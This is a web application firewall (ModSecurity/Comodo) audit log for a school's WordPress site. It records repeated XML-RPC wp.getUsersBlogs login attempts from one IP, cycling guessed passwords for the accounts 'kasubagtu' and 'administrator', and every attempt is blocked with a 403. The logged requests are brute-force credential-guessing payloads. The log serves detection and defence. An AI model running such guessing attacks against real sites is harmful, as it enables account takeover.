Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bb8ac0d-Z-- --4fcebd32-A-- [14/Jun/2025:09:03:27 +0700] aEzYb13g_boun6Rx5jLRZAAAAME 103.236.140.4 36134 103.236.140.4 8181 --4fcebd32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4fcebd32-C-- wp.getUsersBlogs kasubagtu kasubagtu1991 --4fcebd32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4fcebd32-E-- --4fcebd32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866607250324 5546 (- - -) Stopwatch2: 1749866607250324 5546; combined=3946, p1=478, p2=3206, p3=0, p4=0, p5=150, sr=100, sw=112, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4fcebd32-Z-- --77e31d53-A-- [14/Jun/2025:09:04:37 +0700] aEzYtV3g_boun6Rx5jLRhAAAAM8 103.236.140.4 36210 103.236.140.4 8181 --77e31d53-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --77e31d53-C-- wp.getUsersBlogs kasubagtu kasubagtu@2000 --77e31d53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77e31d53-E-- --77e31d53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866677254802 5506 (- - -) Stopwatch2: 1749866677254802 5506; combined=3728, p1=505, p2=3070, p3=0, p4=0, p5=91, sr=85, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77e31d53-Z-- --0b114501-A-- [14/Jun/2025:09:05:37 +0700] aEzY8WmwZ6YUkjOdtI7E_wAAAAw 103.236.140.4 36322 103.236.140.4 8181 --0b114501-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0b114501-C-- wp.getUsersBlogs kasubagtu kasubagtu@1988 --0b114501-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b114501-E-- --0b114501-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (53+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866737334369 4325 (- - -) Stopwatch2: 1749866737334369 4325; combined=3328, p1=338, p2=2732, p3=0, p4=0, p5=188, sr=78, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b114501-Z-- --40636510-A-- [14/Jun/2025:09:06:37 +0700] aEzZLUMWfhkd5Y0sFtrrOQAAAII 103.236.140.4 36440 103.236.140.4 8181 --40636510-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --40636510-C-- wp.getUsersBlogs kasubagtu Password --40636510-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40636510-E-- --40636510-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (53+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866797874575 4220 (- - -) Stopwatch2: 1749866797874575 4220; combined=3204, p1=359, p2=2681, p3=0, p4=0, p5=96, sr=84, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40636510-Z-- --7a370e7b-A-- [14/Jun/2025:09:07:45 +0700] aEzZcWIDXuKmWNi2UBS2PAAAAE8 103.236.140.4 36630 103.236.140.4 8181 --7a370e7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7a370e7b-C-- wp.getUsersBlogs kasubagtu 2222 --7a370e7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a370e7b-E-- --7a370e7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (93+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866865650252 4824 (- - -) Stopwatch2: 1749866865650252 4824; combined=3522, p1=417, p2=2923, p3=0, p4=0, p5=105, sr=87, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a370e7b-Z-- --0d16fd15-A-- [14/Jun/2025:09:08:45 +0700] aEzZrWIDXuKmWNi2UBS2YgAAAEk 103.236.140.4 36732 103.236.140.4 8181 --0d16fd15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0d16fd15-C-- wp.getUsersBlogs kasubagtu admin@888 --0d16fd15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d16fd15-E-- --0d16fd15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866925659957 4281 (- - -) Stopwatch2: 1749866925659957 4281; combined=3321, p1=367, p2=2783, p3=0, p4=0, p5=99, sr=82, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d16fd15-Z-- --b1208334-A-- [14/Jun/2025:09:09:48 +0700] aEzZ7GmwZ6YUkjOdtI7FggAAAAc 103.236.140.4 36890 103.236.140.4 8181 --b1208334-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b1208334-C-- wp.getUsersBlogs kasubagtu work --b1208334-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1208334-E-- --b1208334-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (73+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866988070008 6060 (- - -) Stopwatch2: 1749866988070008 6060; combined=4207, p1=554, p2=3480, p3=0, p4=0, p5=102, sr=100, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1208334-Z-- --ce17ce27-A-- [14/Jun/2025:09:10:50 +0700] aEzaKmmwZ6YUkjOdtI7FvAAAABQ 103.236.140.4 37032 103.236.140.4 8181 --ce17ce27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ce17ce27-C-- wp.getUsersBlogs kasubagtu abc123!@# --ce17ce27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce17ce27-E-- --ce17ce27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867050422818 5324 (- - -) Stopwatch2: 1749867050422818 5324; combined=3723, p1=477, p2=3064, p3=0, p4=0, p5=106, sr=100, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce17ce27-Z-- --04e37527-A-- [14/Jun/2025:09:11:50 +0700] aEzaZmIDXuKmWNi2UBS2igAAAEI 103.236.140.4 37176 103.236.140.4 8181 --04e37527-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --04e37527-C-- wp.getUsersBlogs kasubagtu 1236 --04e37527-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04e37527-E-- --04e37527-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (65+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867110892781 4927 (- - -) Stopwatch2: 1749867110892781 4927; combined=3342, p1=419, p2=2749, p3=0, p4=0, p5=100, sr=83, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04e37527-Z-- --f4bf0946-A-- [14/Jun/2025:09:11:56 +0700] aEzabF3g_boun6Rx5jLRogAAANY 103.236.140.4 37202 103.236.140.4 8181 --f4bf0946-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f4bf0946-C-- wp.getUsersBlogs kasubagtu 1234%^&* --f4bf0946-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4bf0946-E-- --f4bf0946-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867116242972 4060 (- - -) Stopwatch2: 1749867116242972 4060; combined=3118, p1=341, p2=2601, p3=0, p4=0, p5=102, sr=72, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4bf0946-Z-- --89022f1c-A-- [14/Jun/2025:09:12:53 +0700] aEzapWmwZ6YUkjOdtI7F9QAAAAo 103.236.140.4 37316 103.236.140.4 8181 --89022f1c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --89022f1c-C-- wp.getUsersBlogs kasubagtu hello123 --89022f1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89022f1c-E-- --89022f1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867173256285 5429 (- - -) Stopwatch2: 1749867173256285 5429; combined=3873, p1=420, p2=3159, p3=0, p4=0, p5=205, sr=83, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89022f1c-Z-- --2012684c-A-- [14/Jun/2025:09:13:53 +0700] aEza4V3g_boun6Rx5jLRyQAAAMs 103.236.140.4 37406 103.236.140.4 8181 --2012684c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2012684c-C-- wp.getUsersBlogs kasubagtu cheese --2012684c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2012684c-E-- --2012684c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867233855315 4781 (- - -) Stopwatch2: 1749867233855315 4781; combined=3489, p1=362, p2=2931, p3=0, p4=0, p5=111, sr=81, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2012684c-Z-- --6b428810-A-- [14/Jun/2025:09:14:55 +0700] aEzbH2mwZ6YUkjOdtI7GJAAAAAk 103.236.140.4 37534 103.236.140.4 8181 --6b428810-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6b428810-C-- wp.getUsersBlogs kasubagtu hellokitty --6b428810-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b428810-E-- --6b428810-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867295027721 4925 (- - -) Stopwatch2: 1749867295027721 4925; combined=3664, p1=406, p2=3030, p3=0, p4=0, p5=157, sr=85, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b428810-Z-- --c245310b-A-- [14/Jun/2025:09:16:00 +0700] aEzbYGmwZ6YUkjOdtI7GfgAAAAY 103.236.140.4 37780 103.236.140.4 8181 --c245310b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c245310b-C-- wp.getUsersBlogs kasubagtu dallas --c245310b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c245310b-E-- --c245310b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (120+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867360125650 5401 (- - -) Stopwatch2: 1749867360125650 5401; combined=3795, p1=462, p2=3147, p3=0, p4=0, p5=108, sr=89, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c245310b-Z-- --699ab444-A-- [14/Jun/2025:09:17:07 +0700] aEzbo2IDXuKmWNi2UBS2lgAAAE8 103.236.140.4 37938 103.236.140.4 8181 --699ab444-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --699ab444-C-- wp.getUsersBlogs kasubagtu gerrard --699ab444-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --699ab444-E-- --699ab444-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (77+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867427400955 6084 (- - -) Stopwatch2: 1749867427400955 6084; combined=4212, p1=563, p2=3472, p3=0, p4=0, p5=105, sr=116, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --699ab444-Z-- --efd4582a-A-- [14/Jun/2025:09:18:07 +0700] aEzb32mwZ6YUkjOdtI7G1AAAABU 103.236.140.4 38066 103.236.140.4 8181 --efd4582a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 231 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --efd4582a-C-- wp.getUsersBlogs administrator r007p455w0rd --efd4582a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efd4582a-E-- --efd4582a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (60+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] 